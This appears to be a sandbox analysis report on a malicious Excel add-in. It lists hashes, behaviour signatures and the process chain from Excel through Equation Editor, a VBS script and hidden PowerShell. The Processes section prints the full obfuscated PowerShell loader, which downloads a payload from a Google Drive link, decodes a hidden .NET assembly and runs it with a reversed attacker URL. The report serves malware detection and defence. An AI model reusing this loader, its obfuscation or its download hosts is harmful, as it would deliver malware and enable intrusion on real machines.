Analysis

max time kernel: 120s
max time network: 120s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
submitted: 23-10-2024 13:30
Static task: static1

Behavioral task: behavioral1
  Sample: 2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: 2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
  Resource: win10v2004-20241007-en
General

Target: 2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
Size: 596KB
MD5: 6073b84bbdc3b910df55b8b42a16ab65
SHA1: 28c95e7d8f2fa7dee552bcc190b7ec6aaa9ea9f3
SHA256: 2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420
SHA512: 1392956610ded25dc8e5ca50c5a15218e3a2ecdc12314ae7bf0313a47dd35c2ead7aba74fc7381542c2e107b547bbef23f9be1ea8ff653b3da1e1f951485a50d
SSDEEP: 12288:JJRTchjxyfDF5NYzNewgU8mLQobusNRO+IXbpwOjMbR6I6EfjOvCxicvG:JJp4j2FYReBm9bpNROtgt6zErkC7vG
Malware Config

Extracted
  https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  4     1812  EQNEDT32.EXE
  6     2712  powershell.exe
  8     2712  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run Powershell and hide display window.
  pid   Process
  2900  powershell.exe
  2712  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  6     drive.google.com
  5     drive.google.com

Drops file in System32 directory (2 IoCs)
  description                   ioc                                                                                                                            Process
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EXCEL.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EQNEDT32.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Enumerates system info in registry (2 TTPs, 1 IoCs)
  description  ioc                                                                 Process
  Key opened   \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor  EXCEL.EXE

Launches Equation Editor (1 TTPs, 1 IoCs)
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
  pid   Process
  1812  EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid   Process
  2508  EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2900  powershell.exe
  2712  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2900  powershell.exe
  Token: SeDebugPrivilege  2712  powershell.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
  pid   Process
  2508  EXCEL.EXE
  2508  EXCEL.EXE
  2508  EXCEL.EXE

Suspicious use of WriteProcessMemory (12 IoCs)
  description                       pid   Process         procid_target
  PID 1812 wrote to memory of 2724  1812  EQNEDT32.EXE    32
  PID 1812 wrote to memory of 2724  1812  EQNEDT32.EXE    32
  PID 1812 wrote to memory of 2724  1812  EQNEDT32.EXE    32
  PID 1812 wrote to memory of 2724  1812  EQNEDT32.EXE    32
  PID 2724 wrote to memory of 2900  2724  WScript.exe     33
  PID 2724 wrote to memory of 2900  2724  WScript.exe     33
  PID 2724 wrote to memory of 2900  2724  WScript.exe     33
  PID 2724 wrote to memory of 2900  2724  WScript.exe     33
  PID 2900 wrote to memory of 2712  2900  powershell.exe  35
  PID 2900 wrote to memory of 2712  2900  powershell.exe  35
  PID 2900 wrote to memory of 2712  2900  powershell.exe  35
  PID 2900 wrote to memory of 2712  2900  powershell.exe  35
Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE  (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
  PID: 2508
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  (depth 1)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  PID: 1812
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WScript.exe  (depth 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\medicallaboratorydatinglover.vbs"
    PID: 2724
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWVYKCAoJ3FPJysnNGltYWdlVXJsID0gaDFTaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgaDFTO3FPNHcnKydlYkNsaWVuJysndCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDJysnbCcrJ2llbnQ7cU80aW1hZ2VCeXRlcyA9IHFPNHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEocU80aW1hJysnZ2VVcmwpO3EnKydPNGltYWdlVGV4dCA9IFtTJysneXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHFPJysnNGltYWdlQnl0ZXMpO3FPJysnNHN0YXJ0RmxhZyA9IGgxUzw8QkFTRTY0X1NUQVJUPj5oMVM7cU80ZW5kRmxhZyA9IGgxUzw8QkFTRTY0X0VORD4+aDFTO3FPNHN0YXJ0SW5kZXggPSBxTzRpbWFnZVRlJysneHQuSW5kZXhPZihxTzRzdGFydEZsYWcpO3FPNGVuZEluZGV4ID0gcU80aW1hZ2VUZXh0LkluZGV4T2YocU80ZW5kRmxhZyk7cU80cycrJ3RhcnRJbmRleCAtZ2UgMCAtYW5kIHFPNGVuZEluZGV4IC1ndCBxTzRzdGFydEluZCcrJ2V4O3FPNHN0YXJ0SW5kZXggKz0gcU80c3RhcnRGbGEnKydnLkxlbmd0aDtxTzRiYXNlNjRMZW5ndGggPSBxTzRlbmRJbmRleCAtIHFPNHN0YXJ0SW5kZXg7cU80YmFzZTY0Q29tbWFuZCA9IHFPNGltYWdlVGV4dC5TdWJzdCcrJ3JpbmcocU80c3RhcnRJbmRleCwgcU80YmFzZTY0TGVuZ3RoJysnKTtxTzRiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChxTzRiYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgS3lJIEZvckVhY2gtT2JqZWN0IHsgcU80XyB9KScrJ1stMS4uLShxTzRiYXNlNjRDb21tYW5kLkxlbmd0aCldO3FPNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZScrJ20uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocU80YmFzZTY0UmV2ZXJzZWQpO3FPNGxvYWRlZEEnKydzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChxTzRjb21tYW5kQnl0ZXMpO3FPNHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaDFTVkFJaDFTKTtxTzR2YWlNZXRob2QuSW52b2tlKHFPNG51bGwsIEAoaDFTdHh0LjQ0NDZlc2FiYmJiYmInKydiYmJiZXdtYWRhbS80MzEuODcxLjY0Ljg5MS8vOnB0dGhoMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxU2Rlc2F0aXZhJysnZG9oMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxJysnU0FkZEluUHJvY2VzczMyaDFTLCBoMVMnKydkZXNhdGl2YWRvaDFTLCBoMVNkZXNhdGl2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVNkZXNhdGknKyd2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVMxaDFTLGgxU2Rlc2F0aXZhZG9oMVMpKTsnKS5yZVBsQWNFKChbQ2hhUl0xMTMrW0NoYVJdNzk
rW0NoYVJdNTIpLCckJykucmVQbEFjRSgoW0NoYVJdNzUrW0NoYVJdMTIxK1tDaGFSXTczKSxbc3RyaU5nXVtDaGFSXTEyNCkucmVQbEFjRSgoW0NoYVJdMTA0K1tDaGFSXTQ5K1tDaGFSXTgzKSxbc3RyaU5nXVtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
      PID: 2900
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX( ('qO'+'4imageUrl = h1Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur h1S;qO4w'+'ebClien'+'t = New-Object System.Net.WebC'+'l'+'ient;qO4imageBytes = qO4webClient.'+'DownloadData(qO4ima'+'geUrl);q'+'O4imageText = [S'+'ystem.Text.Encoding]::UTF8.GetString(qO'+'4imageBytes);qO'+'4startFlag = h1S<<BASE64_START>>h1S;qO4endFlag = h1S<<BASE64_END>>h1S;qO4startIndex = qO4imageTe'+'xt.IndexOf(qO4startFlag);qO4endIndex = qO4imageText.IndexOf(qO4endFlag);qO4s'+'tartIndex -ge 0 -and qO4endIndex -gt qO4startInd'+'ex;qO4startIndex += qO4startFla'+'g.Length;qO4base64Length = qO4endIndex - qO4startIndex;qO4base64Command = qO4imageText.Subst'+'ring(qO4startIndex, qO4base64Length'+');qO4base64Reversed = -join (qO4base64Command.To'+'CharArray() KyI ForEach-Object { qO4_ })'+'[-1..-(qO4base64Command.Length)];qO4commandBytes = [Syste'+'m.Convert]::FromBase64String(qO4base64Reversed);qO4loadedA'+'ssembly = [System.Reflection.Assembly]::Load(qO4commandBytes);qO4vaiMethod = [dnlib.IO.Home].GetMethod(h1SVAIh1S);qO4vaiMethod.Invoke(qO4null, @(h1Stxt.4446esabbbbbb'+'bbbbewmadam/431.871.64.891//:ptthh1S, h1Sdesativadoh1S, h1Sdesativa'+'doh1S, h1Sdesativadoh1S, h1'+'SAddInProcess32h1S, h1S'+'desativadoh1S, h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesati'+'vadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1S1h1S,h1Sdesativadoh1S));').rePlAcE(([ChaR]113+[ChaR]79+[ChaR]52),'$').rePlAcE(([ChaR]75+[ChaR]121+[ChaR]73),[striNg][ChaR]124).rePlAcE(([ChaR]104+[ChaR]49+[ChaR]83),[striNg][ChaR]39) )"4⤵
        PID: 2712
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 1a55947f9e52ea2b60d984e5d3569e44
  SHA1: 8aeeeb5c9e0c1a402de12381e6a95040fc713ebb
  SHA256: b7a925df4629e9373c3b4a27aa236ec892addcce15c4c45cbd60f2ef3c214c48
  SHA512: 7c8cfc5ad0fe64877805b9920e6e7e6c10e6a0e01b4680efec0abe14c8aa0c15ca18ab7fd35558583c47710607c2c07ec24bbe3f734a1588a0f0b75fc955914d

Second file (path not shown in the report)
  Filesize: 136KB
  MD5: d62f25ced5ad03573d59a9d6fe47faef
  SHA1: c3252d74ed8960f8372b09e170c3e679a085429b
  SHA256: 80bd9d4929c8a9f3909a7a8f143ca4f5d7e14efd477ae19e638c1d4d9e753bdc
  SHA512: a8e676bcbd422e27bbfe87a992b42050304282c25cccc83a8950896d2b465483752d1eb7d269d4bb2b1b08e946bc09cbde150c5735e5b5f14734cf0052cf7bd6